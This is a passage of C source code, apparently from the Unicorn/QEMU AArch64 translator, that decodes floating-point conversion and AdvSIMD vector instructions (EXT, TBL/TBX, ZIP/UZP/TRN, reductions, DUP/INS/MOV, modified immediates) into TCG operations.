tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_ZF, t); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_NF, 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); tcg_temp_free_i64(tcg_ctx, t); } /* Floating point <-> integer conversions * 31 30 29 28 24 23 22 21 20 19 18 16 15 10 9 5 4 0 * +----+---+---+-----------+------+---+-------+-----+-------------+----+----+ * | sf | 0 | S | 1 1 1 1 0 | type | 1 | rmode | opc | 0 0 0 0 0 0 | Rn | Rd | * +----+---+---+-----------+------+---+-------+-----+-------------+----+----+ */ static void disas_fp_int_conv(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 16, 3); int rmode = extract32(insn, 19, 2); int type = extract32(insn, 22, 2); bool sbit = extract32(insn, 29, 1); bool sf = extract32(insn, 31, 1); bool itof = false; if (sbit) { goto do_unallocated; } switch (opcode) { case 2: /* SCVTF */ case 3: /* UCVTF */ itof = true; /* fallthru */ case 4: /* FCVTAS */ case 5: /* FCVTAU */ if (rmode != 0) { goto do_unallocated; } /* fallthru */ case 0: /* FCVT[NPMZ]S */ case 1: /* FCVT[NPMZ]U */ switch (type) { case 0: /* float32 */ case 1: /* float64 */ break; case 3: /* float16 */ if (!dc_isar_feature(aa64_fp16, s)) { goto do_unallocated; } break; default: goto do_unallocated; } if (!fp_access_check(s)) { return; } handle_fpfpcvt(s, rd, rn, opcode, itof, rmode, 64, sf, type); break; default: switch (sf << 7 | type << 5 | rmode << 3 | opcode) { case 0x66: // 0b01100110: /* FMOV half <-> 32-bit int */ case 0x67: // 0b01100111: case 0xe6: // 0b11100110: /* FMOV half <-> 64-bit int */ case 0xe7: // 0b11100111: if (!dc_isar_feature(aa64_fp16, s)) { goto do_unallocated; } /* fallthru */ case 6: // 0b00000110: /* FMOV 32-bit */ case 7: // 0b00000111: case 0xa6: // 0b10100110: /* FMOV 64-bit */ case 0xa7: // 0b10100111: case 0xce: // 0b11001110: /* 
FMOV top half of 128-bit */ case 0xcf: // 0b11001111: if (!fp_access_check(s)) { return; } itof = opcode & 1; handle_fmov(s, rd, rn, type, itof); break; case 0x3e: // 0b00111110: /* FJCVTZS */ if (!dc_isar_feature(aa64_jscvt, s)) { goto do_unallocated; } else if (fp_access_check(s)) { handle_fjcvtzs(s, rd, rn); } break; default: do_unallocated: unallocated_encoding(s); return; } break; } } /* FP-specific subcases of table C3-6 (SIMD and FP data processing) * 31 30 29 28 25 24 0 * +---+---+---+---------+-----------------------------+ * | | 0 | | 1 1 1 1 | | * +---+---+---+---------+-----------------------------+ */ static void disas_data_proc_fp(DisasContext *s, uint32_t insn) { if (extract32(insn, 24, 1)) { /* Floating point data-processing (3 source) */ disas_fp_3src(s, insn); } else if (extract32(insn, 21, 1) == 0) { /* Floating point to fixed point conversions */ disas_fp_fixed_conv(s, insn); } else { switch (extract32(insn, 10, 2)) { case 1: /* Floating point conditional compare */ disas_fp_ccomp(s, insn); break; case 2: /* Floating point data-processing (2 source) */ disas_fp_2src(s, insn); break; case 3: /* Floating point conditional select */ disas_fp_csel(s, insn); break; case 0: switch (ctz32(extract32(insn, 12, 4))) { case 0: /* [15:12] == xxx1 */ /* Floating point immediate */ disas_fp_imm(s, insn); break; case 1: /* [15:12] == xx10 */ /* Floating point compare */ disas_fp_compare(s, insn); break; case 2: /* [15:12] == x100 */ /* Floating point data-processing (1 source) */ disas_fp_1src(s, insn); break; case 3: /* [15:12] == 1000 */ unallocated_encoding(s); break; default: /* [15:12] == 0000 */ /* Floating point <-> integer conversions */ disas_fp_int_conv(s, insn); break; } break; } } } static void do_ext64(DisasContext *s, TCGv_i64 tcg_left, TCGv_i64 tcg_right, int pos) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Extract 64 bits from the middle of two concatenated 64 bit * vector register slices left:right. The extracted bits start * at 'pos' bits into the right (least significant) side. * We return the result in tcg_right, and guarantee not to * trash tcg_left. */ TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); assert(pos > 0 && pos < 64); tcg_gen_shri_i64(tcg_ctx, tcg_right, tcg_right, pos); tcg_gen_shli_i64(tcg_ctx, tcg_tmp, tcg_left, 64 - pos); tcg_gen_or_i64(tcg_ctx, tcg_right, tcg_right, tcg_tmp); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } /* EXT * 31 30 29 24 23 22 21 20 16 15 14 11 10 9 5 4 0 * +---+---+-------------+-----+---+------+---+------+---+------+------+ * | 0 | Q | 1 0 1 1 1 0 | op2 | 0 | Rm | 0 | imm4 | 0 | Rn | Rd | * +---+---+-------------+-----+---+------+---+------+---+------+------+ */ static void disas_simd_ext(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int is_q = extract32(insn, 30, 1); int op2 = extract32(insn, 22, 2); int imm4 = extract32(insn, 11, 4); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); int pos = imm4 << 3; TCGv_i64 tcg_resl, tcg_resh; if (op2 != 0 || (!is_q && extract32(imm4, 3, 1))) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_resh = tcg_temp_new_i64(tcg_ctx); tcg_resl = tcg_temp_new_i64(tcg_ctx); /* Vd gets bits starting at pos bits into Vm:Vn. This is * either extracting 128 bits from a 128:128 concatenation, or * extracting 64 bits from a 64:64 concatenation. 
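* As an illustrative example: the 64-bit variant with imm4 = 3 has
* pos = 24, so the result is (Vm:Vn) >> 24: result bytes 0..4 come
* from Vn bytes 3..7 and result bytes 5..7 from Vm bytes 0..2.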
*/ if (!is_q) { read_vec_element(s, tcg_resl, rn, 0, MO_64); if (pos != 0) { read_vec_element(s, tcg_resh, rm, 0, MO_64); do_ext64(s, tcg_resh, tcg_resl, pos); } tcg_gen_movi_i64(tcg_ctx, tcg_resh, 0); } else { TCGv_i64 tcg_hh; typedef struct { int reg; int elt; } EltPosns; EltPosns eltposns[] = { {rn, 0}, {rn, 1}, {rm, 0}, {rm, 1} }; EltPosns *elt = eltposns; if (pos >= 64) { elt++; pos -= 64; } read_vec_element(s, tcg_resl, elt->reg, elt->elt, MO_64); elt++; read_vec_element(s, tcg_resh, elt->reg, elt->elt, MO_64); elt++; if (pos != 0) { do_ext64(s, tcg_resh, tcg_resl, pos); tcg_hh = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_hh, elt->reg, elt->elt, MO_64); do_ext64(s, tcg_hh, tcg_resh, pos); tcg_temp_free_i64(tcg_ctx, tcg_hh); } } write_vec_element(s, tcg_resl, rd, 0, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resl); write_vec_element(s, tcg_resh, rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resh); clear_vec_high(s, true, rd); } /* TBL/TBX * 31 30 29 24 23 22 21 20 16 15 14 13 12 11 10 9 5 4 0 * +---+---+-------------+-----+---+------+---+-----+----+-----+------+------+ * | 0 | Q | 0 0 1 1 1 0 | op2 | 0 | Rm | 0 | len | op | 0 0 | Rn | Rd | * +---+---+-------------+-----+---+------+---+-----+----+-----+------+------+ */ static void disas_simd_tb(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op2 = extract32(insn, 22, 2); int is_q = extract32(insn, 30, 1); int rm = extract32(insn, 16, 5); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); int is_tblx = extract32(insn, 12, 1); int len = extract32(insn, 13, 2); TCGv_i64 tcg_resl, tcg_resh, tcg_idx; TCGv_i32 tcg_regno, tcg_numregs; if (op2 != 0) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* This does a table lookup: for every byte element in the input * we index into a table formed from up to four vector registers, * and then the output is the result of the lookups. Our helper * function does the lookup operation for a single 64 bit part of * the input. 
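* Each index byte selects one of the 16 * (len + 1) table bytes; an
* out-of-range index yields 0 for TBL but leaves the destination
* byte unchanged for TBX, which is why the TBX path below preloads
* the result registers from rd before the lookups.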
*/ tcg_resl = tcg_temp_new_i64(tcg_ctx); tcg_resh = tcg_temp_new_i64(tcg_ctx); if (is_tblx) { read_vec_element(s, tcg_resl, rd, 0, MO_64); } else { tcg_gen_movi_i64(tcg_ctx, tcg_resl, 0); } if (is_tblx && is_q) { read_vec_element(s, tcg_resh, rd, 1, MO_64); } else { tcg_gen_movi_i64(tcg_ctx, tcg_resh, 0); } tcg_idx = tcg_temp_new_i64(tcg_ctx); tcg_regno = tcg_const_i32(tcg_ctx, rn); tcg_numregs = tcg_const_i32(tcg_ctx, len + 1); read_vec_element(s, tcg_idx, rm, 0, MO_64); gen_helper_simd_tbl(tcg_ctx, tcg_resl, tcg_ctx->cpu_env, tcg_resl, tcg_idx, tcg_regno, tcg_numregs); if (is_q) { read_vec_element(s, tcg_idx, rm, 1, MO_64); gen_helper_simd_tbl(tcg_ctx, tcg_resh, tcg_ctx->cpu_env, tcg_resh, tcg_idx, tcg_regno, tcg_numregs); } tcg_temp_free_i64(tcg_ctx, tcg_idx); tcg_temp_free_i32(tcg_ctx, tcg_regno); tcg_temp_free_i32(tcg_ctx, tcg_numregs); write_vec_element(s, tcg_resl, rd, 0, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resl); write_vec_element(s, tcg_resh, rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resh); clear_vec_high(s, true, rd); } /* ZIP/UZP/TRN * 31 30 29 24 23 22 21 20 16 15 14 12 11 10 9 5 4 0 * +---+---+-------------+------+---+------+---+------------------+------+ * | 0 | Q | 0 0 1 1 1 0 | size | 0 | Rm | 0 | opc | 1 0 | Rn | Rd | * +---+---+-------------+------+---+------+---+------------------+------+ */ static void disas_simd_zip_trn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rm = extract32(insn, 16, 5); int size = extract32(insn, 22, 2); /* opc field bits [1:0] indicate ZIP/UZP/TRN; * bit 2 indicates 1 vs 2 variant of the insn. */ int opcode = extract32(insn, 12, 2); bool part = extract32(insn, 14, 1); bool is_q = extract32(insn, 30, 1); int esize = 8 << size; int i, ofs; int datasize = is_q ? 128 : 64; int elements = datasize / esize; TCGv_i64 tcg_res, tcg_resl, tcg_resh; if (opcode == 0 || (size == 3 && !is_q)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_resl = tcg_const_i64(tcg_ctx, 0); tcg_resh = tcg_const_i64(tcg_ctx, 0); tcg_res = tcg_temp_new_i64(tcg_ctx); for (i = 0; i < elements; i++) { switch (opcode) { case 1: /* UZP1/2 */ { int midpoint = elements / 2; if (i < midpoint) { read_vec_element(s, tcg_res, rn, 2 * i + part, size); } else { read_vec_element(s, tcg_res, rm, 2 * (i - midpoint) + part, size); } break; } case 2: /* TRN1/2 */ if (i & 1) { read_vec_element(s, tcg_res, rm, (i & ~1) + part, size); } else { read_vec_element(s, tcg_res, rn, (i & ~1) + part, size); } break; case 3: /* ZIP1/2 */ { int base = part * elements / 2; if (i & 1) { read_vec_element(s, tcg_res, rm, base + (i >> 1), size); } else { read_vec_element(s, tcg_res, rn, base + (i >> 1), size); } break; } default: g_assert_not_reached(); } ofs = i * esize; if (ofs < 64) { tcg_gen_shli_i64(tcg_ctx, tcg_res, tcg_res, ofs); tcg_gen_or_i64(tcg_ctx, tcg_resl, tcg_resl, tcg_res); } else { tcg_gen_shli_i64(tcg_ctx, tcg_res, tcg_res, ofs - 64); tcg_gen_or_i64(tcg_ctx, tcg_resh, tcg_resh, tcg_res); } } tcg_temp_free_i64(tcg_ctx, tcg_res); write_vec_element(s, tcg_resl, rd, 0, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resl); write_vec_element(s, tcg_resh, rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_resh); clear_vec_high(s, true, rd); } /* * do_reduction_op helper * * This mirrors the Reduce() pseudocode in the ARM ARM. It is * important for correct NaN propagation that we do these * operations in exactly the order specified by the pseudocode. 
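* 'vmap' is a bitmap of the element indices still participating in
* the reduction; each recursion splits it into a low and a high half
* and combines the two partial results with the requested min/max
* operation, reproducing the pseudocode's pairwise tree.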
* * This is a recursive function, TCG temps should be freed by the * calling function once it is done with the values. */ static TCGv_i32 do_reduction_op(DisasContext *s, int fpopcode, int rn, int esize, int size, int vmap, TCGv_ptr fpst) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (esize == size) { int element; MemOp msize = esize == 16 ? MO_16 : MO_32; TCGv_i32 tcg_elem; /* We should have one register left here */ assert(ctpop8(vmap) == 1); element = ctz32(vmap); assert(element < 8); tcg_elem = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_elem, rn, element, msize); return tcg_elem; } else { int bits = size / 2; int shift = ctpop8(vmap) / 2; int vmap_lo = (vmap >> shift) & vmap; int vmap_hi = (vmap & ~vmap_lo); TCGv_i32 tcg_hi, tcg_lo, tcg_res; tcg_hi = do_reduction_op(s, fpopcode, rn, esize, bits, vmap_hi, fpst); tcg_lo = do_reduction_op(s, fpopcode, rn, esize, bits, vmap_lo, fpst); tcg_res = tcg_temp_new_i32(tcg_ctx); switch (fpopcode) { case 0x0c: /* fmaxnmv half-precision */ gen_helper_advsimd_maxnumh(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x0f: /* fmaxv half-precision */ gen_helper_advsimd_maxh(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x1c: /* fminnmv half-precision */ gen_helper_advsimd_minnumh(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x1f: /* fminv half-precision */ gen_helper_advsimd_minh(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x2c: /* fmaxnmv */ gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x2f: /* fmaxv */ gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x3c: /* fminnmv */ gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; case 0x3f: /* fminv */ gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_lo, tcg_hi, fpst); break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, tcg_hi); tcg_temp_free_i32(tcg_ctx, tcg_lo); return tcg_res; } } /* AdvSIMD across lanes * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 * +---+---+---+-----------+------+-----------+--------+-----+------+------+ * | 0 | Q | U | 0 1 1 1 0 | size | 1 1 0 0 0 | opcode | 1 0 | Rn | Rd | * +---+---+---+-----------+------+-----------+--------+-----+------+------+ */ static void disas_simd_across_lanes(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 5); bool is_q = extract32(insn, 30, 1); bool is_u = extract32(insn, 29, 1); bool is_fp = false; bool is_min = false; int esize; int elements; int i; TCGv_i64 tcg_res, tcg_elt; switch (opcode) { case 0x1b: /* ADDV */ if (is_u) { unallocated_encoding(s); return; } /* fall through */ case 0x3: /* SADDLV, UADDLV */ case 0xa: /* SMAXV, UMAXV */ case 0x1a: /* SMINV, UMINV */ if (size == 3 || (size == 2 && !is_q)) { unallocated_encoding(s); return; } break; case 0xc: /* FMAXNMV, FMINNMV */ case 0xf: /* FMAXV, FMINV */ /* Bit 1 of size field encodes min vs max and the actual size * depends on the encoding of the U bit. If not set (and FP16 * enabled) then we do half-precision float instead of single * precision. */ is_min = extract32(size, 1, 1); is_fp = true; if (!is_u && dc_isar_feature(aa64_fp16, s)) { size = 1; } else if (!is_u || !is_q || extract32(size, 0, 1)) { unallocated_encoding(s); return; } else { size = 2; } break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } esize = 8 << size; elements = (is_q ? 
128 : 64) / esize; tcg_res = tcg_temp_new_i64(tcg_ctx); tcg_elt = tcg_temp_new_i64(tcg_ctx); /* These instructions operate across all lanes of a vector * to produce a single result. We can guarantee that a 64 * bit intermediate is sufficient: * + for [US]ADDLV the maximum element size is 32 bits, and * the result type is 64 bits * + for FMAX*V, FMIN*V, ADDV the intermediate type is the * same as the element size, which is 32 bits at most * For the integer operations we can choose to work at 64 * or 32 bits and truncate at the end; for simplicity * we use 64 bits always. The floating point * ops do require 32 bit intermediates, though. */ if (!is_fp) { read_vec_element(s, tcg_res, rn, 0, size | (is_u ? 0 : MO_SIGN)); for (i = 1; i < elements; i++) { read_vec_element(s, tcg_elt, rn, i, size | (is_u ? 0 : MO_SIGN)); switch (opcode) { case 0x03: /* SADDLV / UADDLV */ case 0x1b: /* ADDV */ tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); break; case 0x0a: /* SMAXV / UMAXV */ if (is_u) { tcg_gen_umax_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); } else { tcg_gen_smax_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); } break; case 0x1a: /* SMINV / UMINV */ if (is_u) { tcg_gen_umin_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); } else { tcg_gen_smin_i64(tcg_ctx, tcg_res, tcg_res, tcg_elt); } break; default: g_assert_not_reached(); } } } else { /* Floating point vector reduction ops which work across 32 * bit (single) or 16 bit (half-precision) intermediates. * Note that correct NaN propagation requires that we do these * operations in exactly the order specified by the pseudocode. */ TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, size == MO_16); int fpopcode = opcode | is_min << 4 | is_u << 5; int vmap = (1 << elements) - 1; TCGv_i32 tcg_res32 = do_reduction_op(s, fpopcode, rn, esize, (is_q ? 128 : 64), vmap, fpst); tcg_gen_extu_i32_i64(tcg_ctx, tcg_res, tcg_res32); tcg_temp_free_i32(tcg_ctx, tcg_res32); tcg_temp_free_ptr(tcg_ctx, fpst); } tcg_temp_free_i64(tcg_ctx, tcg_elt); /* Now truncate the result to the width required for the final output */ if (opcode == 0x03) { /* SADDLV, UADDLV: result is 2*esize */ size++; } switch (size) { case 0: tcg_gen_ext8u_i64(tcg_ctx, tcg_res, tcg_res); break; case 1: tcg_gen_ext16u_i64(tcg_ctx, tcg_res, tcg_res); break; case 2: tcg_gen_ext32u_i64(tcg_ctx, tcg_res, tcg_res); break; case 3: break; default: g_assert_not_reached(); } write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_res); } /* DUP (Element, Vector) * * 31 30 29 21 20 16 15 10 9 5 4 0 * +---+---+-------------------+--------+-------------+------+------+ * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 0 0 1 | Rn | Rd | * +---+---+-------------------+--------+-------------+------+------+ * * size: encoded in imm5 (see ARM ARM LowestSetBit()) */ static void handle_simd_dupe(DisasContext *s, int is_q, int rd, int rn, int imm5) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = ctz32(imm5); int index; if (size > 3 || (size == 3 && !is_q)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } index = imm5 >> (size + 1); tcg_gen_gvec_dup_mem(tcg_ctx, size, vec_full_reg_offset(s, rd), vec_reg_offset(s, rn, index, size), is_q ? 
16 : 8, vec_full_reg_size(s)); } /* DUP (element, scalar) * 31 21 20 16 15 10 9 5 4 0 * +-----------------------+--------+-------------+------+------+ * | 0 1 0 1 1 1 1 0 0 0 0 | imm5 | 0 0 0 0 0 1 | Rn | Rd | * +-----------------------+--------+-------------+------+------+ */ static void handle_simd_dupes(DisasContext *s, int rd, int rn, int imm5) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = ctz32(imm5); int index; TCGv_i64 tmp; if (size > 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } index = imm5 >> (size + 1); /* This instruction just extracts the specified element and * zero-extends it into the bottom of the destination register. */ tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tmp, rn, index, size); write_fp_dreg(s, rd, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } /* DUP (General) * * 31 30 29 21 20 16 15 10 9 5 4 0 * +---+---+-------------------+--------+-------------+------+------+ * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 0 1 1 | Rn | Rd | * +---+---+-------------------+--------+-------------+------+------+ * * size: encoded in imm5 (see ARM ARM LowestSetBit()) */ static void handle_simd_dupg(DisasContext *s, int is_q, int rd, int rn, int imm5) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = ctz32(imm5); uint32_t dofs, oprsz, maxsz; if (size > 3 || ((size == 3) && !is_q)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } dofs = vec_full_reg_offset(s, rd); oprsz = is_q ? 16 : 8; maxsz = vec_full_reg_size(s); tcg_gen_gvec_dup_i64(tcg_ctx, size, dofs, oprsz, maxsz, cpu_reg(s, rn)); } /* INS (Element) * * 31 21 20 16 15 14 11 10 9 5 4 0 * +-----------------------+--------+------------+---+------+------+ * | 0 1 1 0 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | * +-----------------------+--------+------------+---+------+------+ * * size: encoded in imm5 (see ARM ARM LowestSetBit()) * index: encoded in imm5<4:size+1> */ static void handle_simd_inse(DisasContext *s, int rd, int rn, int imm4, int imm5) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = ctz32(imm5); int src_index, dst_index; TCGv_i64 tmp; if (size > 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } dst_index = extract32(imm5, 1+size, 5); src_index = extract32(imm4, size, 4); tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tmp, rn, src_index, size); write_vec_element(s, tmp, rd, dst_index, size); tcg_temp_free_i64(tcg_ctx, tmp); /* INS is considered a 128-bit write for SVE. */ clear_vec_high(s, true, rd); } /* INS (General) * * 31 21 20 16 15 10 9 5 4 0 * +-----------------------+--------+-------------+------+------+ * | 0 1 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 1 1 1 | Rn | Rd | * +-----------------------+--------+-------------+------+------+ * * size: encoded in imm5 (see ARM ARM LowestSetBit()) * index: encoded in imm5<4:size+1> */ static void handle_simd_insg(DisasContext *s, int rd, int rn, int imm5) { int size = ctz32(imm5); int idx; if (size > 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } idx = extract32(imm5, 1 + size, 4 - size); write_vec_element(s, cpu_reg(s, rn), rd, idx, size); /* INS is considered a 128-bit write for SVE. 
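* (That is, when SVE is implemented the bits above the low 128 bits
* of the destination are zeroed even though only a single element is
* written; hence the clear_vec_high() call below.)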
*/ clear_vec_high(s, true, rd); } /* * UMOV (General) * SMOV (General) * * 31 30 29 21 20 16 15 12 10 9 5 4 0 * +---+---+-------------------+--------+-------------+------+------+ * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 1 U 1 1 | Rn | Rd | * +---+---+-------------------+--------+-------------+------+------+ * * U: unsigned when set * size: encoded in imm5 (see ARM ARM LowestSetBit()) */ static void handle_simd_umov_smov(DisasContext *s, int is_q, int is_signed, int rn, int rd, int imm5) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = ctz32(imm5); int element; TCGv_i64 tcg_rd; /* Check for UnallocatedEncodings */ if (is_signed) { if (size > 2 || (size == 2 && !is_q)) { unallocated_encoding(s); return; } } else { if (size > 3 || (size < 3 && is_q) || (size == 3 && !is_q)) { unallocated_encoding(s); return; } } if (!fp_access_check(s)) { return; } element = extract32(imm5, 1+size, 4); tcg_rd = cpu_reg(s, rd); read_vec_element(s, tcg_rd, rn, element, size | (is_signed ? MO_SIGN : 0)); if (is_signed && !is_q) { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } } /* AdvSIMD copy * 31 30 29 28 21 20 16 15 14 11 10 9 5 4 0 * +---+---+----+-----------------+------+---+------+---+------+------+ * | 0 | Q | op | 0 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | * +---+---+----+-----------------+------+---+------+---+------+------+ */ static void disas_simd_copy(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int imm4 = extract32(insn, 11, 4); int op = extract32(insn, 29, 1); int is_q = extract32(insn, 30, 1); int imm5 = extract32(insn, 16, 5); if (op) { if (is_q) { /* INS (element) */ handle_simd_inse(s, rd, rn, imm4, imm5); } else { unallocated_encoding(s); } } else { switch (imm4) { case 0: /* DUP (element - vector) */ handle_simd_dupe(s, is_q, rd, rn, imm5); break; case 1: /* DUP (general) */ handle_simd_dupg(s, is_q, rd, rn, imm5); break; case 3: if (is_q) { /* INS (general) */ handle_simd_insg(s, rd, rn, imm5); } else { unallocated_encoding(s); } break; case 5: case 7: /* UMOV/SMOV (is_q indicates 32/64; imm4 indicates signedness) */ handle_simd_umov_smov(s, is_q, (imm4 == 5), rn, rd, imm5); break; default: unallocated_encoding(s); break; } } } /* AdvSIMD modified immediate * 31 30 29 28 19 18 16 15 12 11 10 9 5 4 0 * +---+---+----+---------------------+-----+-------+----+---+-------+------+ * | 0 | Q | op | 0 1 1 1 1 0 0 0 0 0 | abc | cmode | o2 | 1 | defgh | Rd | * +---+---+----+---------------------+-----+-------+----+---+-------+------+ * * There are a number of operations that can be carried out here: * MOVI - move (shifted) imm into register * MVNI - move inverted (shifted) imm into register * ORR - bitwise OR of (shifted) imm with register * BIC - bitwise clear of (shifted) imm with register * With ARMv8.2 we also have: * FMOV half-precision */ static void disas_simd_mod_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int cmode = extract32(insn, 12, 4); int cmode_3_1 = extract32(cmode, 1, 3); int cmode_0 = extract32(cmode, 0, 1); int o2 = extract32(insn, 11, 1); uint64_t abcdefgh = extract32(insn, 5, 5) | (extract32(insn, 16, 3) << 5); bool is_neg = extract32(insn, 29, 1); bool is_q = extract32(insn, 30, 1); uint64_t imm = 0; if (o2 != 0 || ((cmode == 0xf) && is_neg && !is_q)) { /* Check for FMOV (vector, immediate) - half-precision */ if (!(dc_isar_feature(aa64_fp16, s) && o2 && cmode == 0xf)) { unallocated_encoding(s); return; } } if (!fp_access_check(s)) { return; } /* See 
AdvSIMDExpandImm() in ARM ARM */ switch (cmode_3_1) { case 0: /* Replicate(Zeros(24):imm8, 2) */ case 1: /* Replicate(Zeros(16):imm8:Zeros(8), 2) */ case 2: /* Replicate(Zeros(8):imm8:Zeros(16), 2) */ case 3: /* Replicate(imm8:Zeros(24), 2) */ { int shift = cmode_3_1 * 8; imm = bitfield_replicate(abcdefgh << shift, 32); break; } case 4: /* Replicate(Zeros(8):imm8, 4) */ case 5: /* Replicate(imm8:Zeros(8), 4) */ { int shift = (cmode_3_1 & 0x1) * 8; imm = bitfield_replicate(abcdefgh << shift, 16); break; } case 6: if (cmode_0) { /* Replicate(Zeros(8):imm8:Ones(16), 2) */ imm = (abcdefgh << 16) | 0xffff; } else { /* Replicate(Zeros(16):imm8:Ones(8), 2) */ imm = (abcdefgh << 8) | 0xff; } imm = bitfield_replicate(imm, 32); break; case 7: if (!cmode_0 && !is_neg) { imm = bitfield_replicate(abcdefgh, 8); } else if (!cmode_0 && is_neg) { int i; imm = 0; for (i = 0; i < 8; i++) { if ((abcdefgh) & (1ULL << i)) { imm |= 0xffULL << (i * 8); } } } else if (cmode_0) { if (is_neg) { imm = (abcdefgh & 0x3f) << 48; if (abcdefgh & 0x80) { imm |= 0x8000000000000000ULL; } if (abcdefgh & 0x40) { imm |= 0x3fc0000000000000ULL; } else { imm |= 0x4000000000000000ULL; } } else { if (o2) { /* FMOV (vector, immediate) - half-precision */ imm = vfp_expand_imm(MO_16, abcdefgh); /* now duplicate across the lanes */ imm = bitfield_replicate(imm, 16); } else { imm = (abcdefgh & 0x3f) << 19; if (abcdefgh & 0x80) { imm |= 0x80000000; } if (abcdefgh & 0x40) { imm |= 0x3e000000; } else { imm |= 0x40000000; } imm |= (imm << 32); } } } break; default: fprintf(stderr, "%s: cmode_3_1: %x\n", __func__, cmode_3_1); g_assert_not_reached(); } if (cmode_3_1 != 7 && is_neg) { imm = ~imm; } if (!((cmode & 0x9) == 0x1 || (cmode & 0xd) == 0x9)) { /* MOVI or MVNI, with MVNI negation handled above. */ tcg_gen_gvec_dup64i(tcg_ctx, vec_full_reg_offset(s, rd), is_q ? 16 : 8, vec_full_reg_size(s), imm); } else { /* ORR or BIC, with BIC negation to AND handled above. */ if (is_neg) { gen_gvec_fn2i(s, is_q, rd, rd, imm, tcg_gen_gvec_andi, MO_64); } else { gen_gvec_fn2i(s, is_q, rd, rd, imm, tcg_gen_gvec_ori, MO_64); } } } /* AdvSIMD scalar copy * 31 30 29 28 21 20 16 15 14 11 10 9 5 4 0 * +-----+----+-----------------+------+---+------+---+------+------+ * | 0 1 | op | 1 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | * +-----+----+-----------------+------+---+------+---+------+------+ */ static void disas_simd_scalar_copy(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int imm4 = extract32(insn, 11, 4); int imm5 = extract32(insn, 16, 5); int op = extract32(insn, 29, 1); if (op != 0 || imm4 != 0) { unallocated_encoding(s); return; } /* DUP (element, scalar) */ handle_simd_dupes(s, rd, rn, imm5); } /* AdvSIMD 